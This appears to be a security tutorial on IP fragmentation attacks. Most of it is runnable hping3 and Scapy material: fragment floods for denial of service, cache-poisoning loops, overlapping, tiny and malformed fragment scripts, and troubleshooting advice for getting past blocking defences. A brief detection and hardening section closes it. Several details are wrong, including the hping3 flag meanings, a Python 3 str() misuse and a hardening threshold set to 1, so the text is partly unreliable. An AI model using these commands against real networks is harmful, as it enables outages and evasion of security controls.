Fragmentation Attacks

Understanding Fragmentation Attacks - Packet Reassembly Exploitation

What is Fragmentation Attacks?

Simple Definition: Fragmentation attacks exploit how systems break large IP packets into smaller pieces and reassemble them, allowing attackers to bypass security controls, crash systems, or hide malicious content by manipulating packet fragments.

Technical Definition: Fragmentation attacks leverage vulnerabilities in IP packet fragmentation and reassembly mechanisms to evade intrusion detection systems, exploit buffer overflow conditions, bypass firewall rules, or cause denial of service through resource exhaustion or malformed fragment processing.

Why Fragmentation Attacks Work

Fragmentation attacks succeed due to complexity in fragment handling and implementation inconsistencies:

• Stateless Inspection Bypass: Simple firewalls and IDS cannot reassemble fragments for complete analysis
• Resource Exhaustion: Fragment reassembly consumes memory and CPU resources
• Implementation Differences: Various systems handle overlapping or malformed fragments differently
• Fragment Queue Limits: Systems have finite capacity for storing incomplete fragment sets

Attack Process Breakdown

Normal IP Fragmentation

1. MTU Discovery: Sender determines maximum transmission unit for path
2. Fragment Creation: Large packets split into MTU-sized fragments
3. Fragment Transmission: Each fragment sent with identification and offset fields
4. Reassembly: Destination reconstructs original packet from fragments
5. Processing: Complete packet processed by upper layer protocols

Fragmentation Attack Exploitation

1. Target Analysis: Identify systems vulnerable to fragmentation attacks
2. Fragment Crafting: Create malicious fragments with specific offsets and flags
3. Attack Delivery: Send crafted fragments to exploit reassembly weaknesses
4. Evasion Achievement: Bypass security controls through fragment manipulation
5. System Impact: Cause denial of service, buffer overflows, or security bypass

Real-World Impact

Security Control Bypass: Evade firewalls and IDS that don’t perform complete fragment reassembly

Denial of Service: Exhaust system resources through fragment queue flooding or malformed reassembly

Buffer Overflow Exploitation: Trigger memory corruption through overlapping fragment attacks

Network Reconnaissance: Probe target systems to identify fragmentation handling behaviors

Protocol Stack Attacks: Exploit operating system differences in fragment processing implementations

Technical Concepts

IP Fragmentation Mechanics

IP Header Fragment Fields:

• Identification: 16-bit field linking related fragments
• Flags: 3-bit field controlling fragmentation behavior
  • Bit 0: Reserved (must be 0)
  • Bit 1: Don’t Fragment (DF) flag
  • Bit 2: More Fragments (MF) flag
• Fragment Offset: 13-bit field indicating fragment position

Fragment Reassembly Process

Fragment Collection: System collects fragments with matching identification Overlap Handling: Determines how to handle overlapping fragment data Timeout Management: Fragments expire if not completely reassembled Buffer Management: Limited memory allocated for fragment reassembly queues

Attack Categories

Overlapping Fragments: Fragments with overlapping data to confuse reassembly Tiny Fragments: Extremely small fragments to bypass content inspection Fragment Flooding: Overwhelming fragment queues with incomplete sets Malformed Fragments: Invalid fragment parameters to trigger parsing errors

Technical Implementation

Prerequisites

Network Requirements:

• Raw socket access for custom packet crafting
• Understanding of target MTU and fragmentation behavior
• Knowledge of security device fragment handling

Essential Tools:

• Hping3: Fragment creation and manipulation
• Scapy: Custom fragment crafting and analysis
• Nmap: Fragment-based scanning techniques
• Fragroute: Fragment manipulation and routing

Essential Command Sequence

Step 1: Target Fragment Behavior Analysis

# Test MTU discovery and fragmentation
ping -s 1472 192.168.1.100
# -s 1472: Payload size (1500 - 28 byte headers)
# Should not fragment on standard Ethernet
# Larger sizes will trigger fragmentation

# Force fragmentation with large packets
ping -s 4000 192.168.1.100
# Forces packet fragmentation
# Observe how target handles large fragmented packets

# Test Don't Fragment flag handling
hping3 -c 1 -p 80 -s 1024 -f -F 192.168.1.100
# -f: Set Don't Fragment flag
# -F: Set fragment offset (invalid combination)
# Tests target's fragment flag validation

Purpose: Understand how target systems handle fragmentation and identify potential weaknesses in fragment processing.

Step 2: Basic Fragment Flooding Attack

# Fragment flood to exhaust reassembly resources
hping3 --flood -f -p 80 192.168.1.100
# --flood: Send packets as fast as possible
# -f: Fragment packets
# Creates many incomplete fragment sets

# Controlled fragment flooding with specific rate
hping3 -i u1000 -f -p 80 -d 1400 192.168.1.100
# -i u1000: 1ms intervals (1000 packets/second)
# -d 1400: Large payload to force fragmentation
# More controlled resource exhaustion

# Monitor fragment reassembly on target
# From target system (if accessible):
netstat -s | grep -i frag
# Shows fragment statistics
# Increases indicate successful fragment flooding

Step 3: Overlapping Fragment Attacks

Using Scapy for Precise Control:

#!/usr/bin/env python3
from scapy.all import *

# Create overlapping fragments
frag1 = IP(dst="192.168.1.100", id=12345, frag=0, flags="MF")/\
        ICMP()/("A" * 8)

frag2 = IP(dst="192.168.1.100", id=12345, frag=1, flags=0)/\
        ("B" * 8)

# Send overlapping fragments
send([frag1, frag2])

# This creates overlapping data at offset 8
# Different systems handle overlap differently
# Can trigger parsing vulnerabilities

Command-line Overlapping Fragments:

# Manual fragment creation with hping3
echo "AAAAAAAA" | hping3 -c 1 -p 80 -f --frag 0 -E /dev/stdin 192.168.1.100 &
echo "BBBBBBBB" | hping3 -c 1 -p 80 -f --frag 1 -E /dev/stdin 192.168.1.100 &
# Creates overlapping 8-byte fragments
# Tests target's overlap resolution policy

Step 4: Tiny Fragment Evasion

# Create tiny fragments to bypass inspection
hping3 -c 1 -p 80 -f --frag 0 -d 8 192.168.1.100
# First fragment contains only 8 bytes
# May not include complete TCP header
# Can bypass content-based filtering

# Extremely small fragments for maximum evasion
for offset in 0 1 2 3 4; do
    echo -n "X" | hping3 -c 1 -p 80 -f --frag $offset -E /dev/stdin 192.168.1.100
done
# Creates 1-byte fragments
# Maximum fragmentation for evasion

Tiny Fragment Attack with Scapy:

#!/usr/bin/env python3
from scapy.all import *

# Create tiny fragments carrying TCP SYN
tcp_syn = TCP(dport=80, flags="S")
payload = str(tcp_syn)

# Split into 4-byte fragments
for i in range(0, len(payload), 4):
    chunk = payload[i:i+4]
    flags = "MF" if i + 4 < len(payload) else 0
    frag = IP(dst="192.168.1.100", id=54321, frag=i//8, flags=flags)/chunk
    send(frag)

Step 5: Malformed Fragment Attacks

# Invalid fragment offset attack
hping3 -c 1 -p 80 --frag 8191 192.168.1.100
# Maximum fragment offset (8191 * 8 = 65528)
# Tests boundary condition handling

# Fragment with impossible total length
hping3 -c 1 -p 80 -f --frag 100 -d 65500 192.168.1.100
# Large fragment offset with large payload
# Results in impossible packet length
# May trigger parsing errors

# Zero-length fragment attack
hping3 -c 1 -p 80 -f --frag 0 -d 0 192.168.1.100
# Fragment with no payload
# Tests empty fragment handling

Custom Malformed Fragments:

#!/usr/bin/env python3
from scapy.all import *

# Fragment with invalid More Fragments flag
malformed = IP(dst="192.168.1.100", id=99999, frag=0, flags="MF")/\
            ICMP()/("X" * 1480)

# This is the last fragment but MF flag is set
# Creates inconsistent fragment state
send(malformed)

Attack Variations

Protocol-Specific Fragmentation

# TCP fragmentation to bypass stateful inspection
# Fragment across TCP header boundary
hping3 -c 1 -S -p 80 -f --frag 0 -d 12 192.168.1.100
# Partial TCP header in first fragment
# Port number in second fragment
# Bypasses simple TCP port filtering

IPv6 Fragmentation Attacks

# IPv6 fragment header manipulation
ping6 -s 2000 -M do 2001:db8::100
# IPv6 fragmentation using extension headers
# Different parsing rules than IPv4
# May bypass IPv6-unaware security devices

Time-Based Fragment Attacks

# Delayed fragment delivery
hping3 -c 1 -p 80 -f --frag 0 192.168.1.100
sleep 30
hping3 -c 1 -p 80 -f --frag 1 192.168.1.100
# Send fragments with delays
# Tests reassembly timeout handling
# May cause memory leaks or parsing issues

Common Issues and Solutions

Problem: Fragments not reaching target

• Solution: Check MTU settings, verify fragmentation is actually needed, test with different fragment sizes

Problem: No apparent impact from fragment attacks

• Solution: Increase attack volume, try different fragment patterns, verify target system vulnerability

Problem: Attack blocked by network security

• Solution: Use legitimate-looking fragment patterns, vary timing, combine with other evasion techniques

Problem: Fragments being reassembled by intermediate devices

• Solution: Target different network segments, use application-layer fragmentation, employ protocol tunneling

Advanced Techniques

Fragment Reassembly Race Conditions

#!/usr/bin/env python3
from scapy.all import *
import threading

def send_fragment_set(target, fragment_id, data1, data2):
    # Race condition: send conflicting fragments simultaneously
    frag1 = IP(dst=target, id=fragment_id, frag=0, flags="MF")/data1
    frag2 = IP(dst=target, id=fragment_id, frag=0, flags=0)/data2
    
    # Send simultaneously from different threads
    send(frag1)
    send(frag2)

# Launch race condition attack
threading.Thread(target=send_fragment_set, 
                args=("192.168.1.100", 11111, "GOOD", "EVIL")).start()

Fragment Cache Poisoning

# Poison fragment reassembly caches
for id in {1000..2000}; do
    hping3 -c 1 -p 80 -f --frag 0 --id $id 192.168.1.100 &
done
# Creates many incomplete fragment sets
# Fills reassembly tables with garbage
# Prevents legitimate fragment processing

Cross-Protocol Fragmentation

# Fragment ICMP to look like TCP
# Craft ICMP packet that resembles TCP when fragmented
# May bypass protocol-specific filtering
# Requires careful payload crafting

Detection and Prevention

Detection Indicators

• High volume of fragmented packets
• Fragments with unusual offset patterns
• Incomplete fragment sets accumulating
• Overlapping or malformed fragments
• Resource exhaustion in fragment processing

Prevention Measures

Network Configuration:

• Configure routers to limit fragment forwarding
• Implement fragment reassembly at network borders
• Set appropriate MTU values to minimize fragmentation
• Deploy anti-fragmentation firewalls

System Hardening:

# Linux fragment protection
echo 1 > /proc/sys/net/ipv4/ipfrag_high_thresh
echo 262144 > /proc/sys/net/ipv4/ipfrag_low_thresh
echo 30 > /proc/sys/net/ipv4/ipfrag_time

# Disable IP source routing
echo 0 > /proc/sys/net/ipv4/conf/all/accept_source_route

Monitoring and Analysis:

• Monitor fragment reassembly statistics
• Detect abnormal fragmentation patterns
• Implement fragment analysis in IDS/IPS
• Log and analyze fragment attack indicators

Professional Context

Legitimate Use Cases

• Security Testing: Validating fragment handling and security control effectiveness
• Protocol Analysis: Understanding fragmentation behavior in network protocols
• Performance Testing: Assessing system resilience to fragmented traffic
• Vulnerability Research: Discovering new fragmentation-related security issues

Legal and Ethical Requirements

Authorization: Fragmentation attacks can cause system crashes and service disruption - explicit permission required

Scope Definition: Clearly identify which systems and network segments are in-scope for testing

Impact Assessment: Document potential for denial of service and system instability

Recovery Planning: Ensure ability to restore normal operations if systems are impacted

Fragmentation attacks highlight the complexity of network protocol implementations and demonstrate the importance of robust packet processing and reassembly mechanisms in maintaining network security.